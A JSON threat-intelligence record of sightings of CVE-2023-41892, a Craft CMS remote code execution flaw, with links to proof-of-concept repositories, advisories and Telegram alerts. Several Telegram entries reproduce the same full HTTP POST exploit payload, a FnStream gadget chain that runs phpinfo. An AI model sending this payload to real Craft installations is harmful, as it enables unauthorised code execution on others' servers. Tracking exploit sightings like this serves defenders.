{"vulnerability": "CVE-2023-41892", "sightings": [{"uuid": "88426ef5-2672-4920-892b-11609cd7b0ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb", "content": "", "creation_timestamp": "2023-12-22T10:26:48.000000Z"}, {"uuid": "174818d3-5eeb-4dc7-8f65-06bd6950dd57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114410089366436743", "content": "", "creation_timestamp": "2025-04-27T13:10:21.284519Z"}, {"uuid": "9c880f4e-dca8-4dc6-94b7-1cf772f487bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "ef20858a-44d1-4f62-a38e-50d4aec65bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:56.000000Z"}, {"uuid": "03a30804-efbc-43a2-82e0-57b8ef6f9dbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:01.000000Z"}, {"uuid": "3d7382b7-b9c6-4f2d-85a5-1899b90dc524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/6lKByArH9FS3kGV0eBc5AxMt53ZNy3FxF1pgZuVY2NXgTHI", "content": "", "creation_timestamp": "2025-08-21T15:00:06.000000Z"}, {"uuid": "667fd6cb-4059-4290-92da-ecb45c0a78d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/5886ffebd9bdbd338fc1178cfafd37fe", "content": "", "creation_timestamp": "2026-01-24T21:30:29.000000Z"}, {"uuid": "cca4602e-e97a-4c40-bc37-77d36b31a010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/ba0356b10ddaaccd4ba9c4e638dd6fdf", "content": "", "creation_timestamp": "2026-01-24T21:30:28.000000Z"}, {"uuid": "729b47f7-5bb3-4b34-8338-32b81e6058da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://gist.github.com/alon710/b5ac76215ce9d95cc59553712b814232", "content": "", "creation_timestamp": "2026-01-24T22:42:30.000000Z"}, {"uuid": "d8cbf05b-755a-4380-95ad-3525ef204f99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5295", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aMass check CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)\nURL\uff1ahttps://github.com/rajat4722/Bug-Bounty-Hacktoberfest-2023\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2023-10-06T01:58:24.000000Z"}, {"uuid": "f92478fb-cc2a-4cf3-8547-9d112e6cdf23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5294", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aMass check CVE-2023-41892 - Craft CMS Remote Code Execution (RCE)\nURL\uff1ahttps://github.com/zaenhaxor/CVE-2023-41892\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-10-06T01:23:11.000000Z"}, {"uuid": "d87a2f09-0a7c-4bc1-a694-bc3b8fd83558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6678", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aA Craft CMS vulnerability that allows Remote Code Execution (RCE).\nURL\uff1ahttps://github.com/acesoyeo/CVE-2023-41892\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-02-26T18:36:05.000000Z"}, {"uuid": "444cca1b-9cc5-4a10-af86-20fed31600e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13769", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32432\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.\n\ud83d\udccf Published: 2025-04-25T15:04:06.272Z\n\ud83d\udccf Modified: 2025-04-29T03:55:14.713Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3\n2. https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47\n3. https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical\n4. https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical\n5. https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical", "creation_timestamp": "2025-04-29T04:11:16.000000Z"}, {"uuid": "4cb30370-2115-43e9-8c39-6404c084e266", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2036", "content": "https://github.com/acesoyeo/CVE-2023-41892\nA Craft CMS vulnerability that allows Remote Code Execution (RCE).\n\n#github #poc", "creation_timestamp": "2024-02-27T03:33:37.000000Z"}, {"uuid": "c57fd207-238f-4cf9-acd9-046f07a8d95d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/YouPentest/9864", "content": "\u200aCraft CMS CVE-2023-41892 Vulnerability Exploitation | POC\n\nhttps://www.youtube.com/watch?v=iR39Kaez_eM", "creation_timestamp": "2024-05-11T09:02:34.000000Z"}, {"uuid": "9aad44fd-804d-4bf3-920e-fb758d979001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/tSoOD7lIoEkTLn5qIgH1mN18Q4Br_c6j05ucV-ly2IMxmQ", "content": "", "creation_timestamp": "2024-07-24T07:42:05.000000Z"}, {"uuid": "e507e795-7efc-48d1-83ae-4a5aabb8afcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/11", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-26T14:22:24.000000Z"}, {"uuid": "0aba01f2-286b-48fb-88dd-80c443b3d268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/cibsecurity/70423", "content": "\u203c CVE-2023-41892 \u203c\n\nCraft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-14T00:23:55.000000Z"}, {"uuid": "acb4a6dc-da38-4a42-97dd-8e72c96a94d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14718", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T08:07:49.000000Z"}, {"uuid": "9af6019d-141a-4fea-8c67-1537a3f5205c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1420", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T08:07:49.000000Z"}, {"uuid": "d89b684e-76b8-445c-bc1f-51667efa1192", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/arpsyndicate/2173", "content": "#ExploitObserverAlert\n\nCVE-2023-41892\n\nDESCRIPTION: Exploit Observer has 10 entries related to CVE-2023-41892. Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\nFIRST-EPSS: 0.206280000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-28T01:26:31.000000Z"}, {"uuid": "46d62d79-a96a-4aba-92a7-f426cb50b199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "seen", "source": "https://t.me/arpsyndicate/2142", "content": "#ExploitObserverAlert\n\nCVE-2023-41892\n\nDESCRIPTION: Exploit Observer has 9 entries related to CVE-2023-41892. Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector. Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.\n\nFIRST-EPSS: 0.206280000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-24T03:13:06.000000Z"}, {"uuid": "dc1c4bd0-b6e4-44b0-8155-1516ac83ad74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2844", "content": "CVE-2023-41892\n\nPOST /ConditionsController.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n \naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n\nphpinfo\n\n#exploit #poc", "creation_timestamp": "2024-07-24T07:53:42.000000Z"}, {"uuid": "6fdf2ec7-3c17-4ba4-a118-4a643493cb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "Telegram/P54oWrjIQ0srG3w1diPYq2BJvN7sj5tg3YtSdd5A32_mgjr9", "content": "", "creation_timestamp": "2024-07-25T22:50:29.000000Z"}, {"uuid": "c46491d2-b5c6-46fb-b90a-e5a31b9b8b2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41892", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9042", "content": "#exploit\n1. CVE-2023-4352:\nChrome Read-Only Property Overwrite\nhttps://packetstormsecurity.com/files/174669/Chrome-Read-Only-Property-Overwrite.html\n\n2. CVE-2023-37154:\nHacking Monitored Servers with check_by_ssh and Argument Injection\nhttps://joshua.hu/nagios-hacking-cve-2023-37154\n\n3. CVE-2023-41892:\nCraftCMS RCE\nhttps://blog.calif.io/p/craftcms-rce", "creation_timestamp": "2023-09-18T18:53:57.000000Z"}]}